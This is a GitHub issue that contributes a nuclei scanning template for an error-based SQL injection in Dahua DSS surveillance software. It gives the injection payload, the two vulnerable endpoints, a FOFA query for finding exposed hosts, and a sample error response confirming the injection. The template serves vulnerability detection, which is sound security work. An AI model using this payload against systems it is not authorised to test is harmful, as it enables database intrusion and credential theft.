[nuclei-template] CNVD-2017-06001 Dahua DSS SQL injection
shibeta opened this issue · comments
Template Information:
Dahua DSS Digital Surveillance System is a security video monitoring system developed by Dahua.
A SQL injection vulnerability exists within Dahua DSS. Attackers can send specially crafted data packets to the attachment_clearTempFile.action
or attachment_getAttList.action
route, exploiting error-based injection to acquire sensitive information from the database. Beyond obtaining information from the database such as administrator credentials and personal information of users on the site, attackers could potentially write trojans to the server with sufficient privileges and further gain system-level access.
Relevant vulnerability ID: CNVD-2017-06001
Nuclei Template:
id: CNVD-2017-06001
info:
name: error-based SQL Injection in Dahua DSS
author: napgh0st
tags: cnvd,cnvd2017,sql-injection,dahua
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001
severity: high
metadata:
fofa-query: app="dahua-DSS"
variables:
random_num: "{{rand_int(10000, 99999)}}"
random_text: "{{rand_base(5)}}"
payload: "{{rand_int(800000, 999999)}}"
poc: "1') AND EXTRACTVALUE({{random_num}},CONCAT(0x5c,(SELECT (ELT({{random_num}}={{random_num}},{{payload}}))),0x5c)) AND ('{{random_text}}'='{{random_text}}"
http:
- method: GET
path:
- "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId={{poc}}&bean.TabName=1"
- "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId={{poc}}&bean.TabName=1"
stop-at-first-match: true
matchers:
- type: word
part: body
condition: and
words:
- "XPATH syntax error"
- "{{payload}}"
valid match response snippet:
org.springframework.jdbc.UncategorizedSQLException: PreparedStatementCallback; uncategorized SQLException for SQL [select * from C_ATTACHMENT t where 1=1 and t.tab_Name=? and t.rec_Id in('1') AND EXTRACTVALUE(32776,CONCAT(0x5c,(SELECT (ELT(32776=32776,909836))),0x5c)) AND ('6jQ6F'='6jQ6F') and t.tmp_flag = ?]; SQL state [HY000]; error code [1105]; XPATH syntax error: '\909836\'; nested exception is java.sql.SQLException: XPATH syntax error: '\909836\'
Hello @shibeta, thank you so much for sharing this template with the community and contributing to this project 🍻
You can grab some cool PD stickers over here http://nux.gg/stickers 😄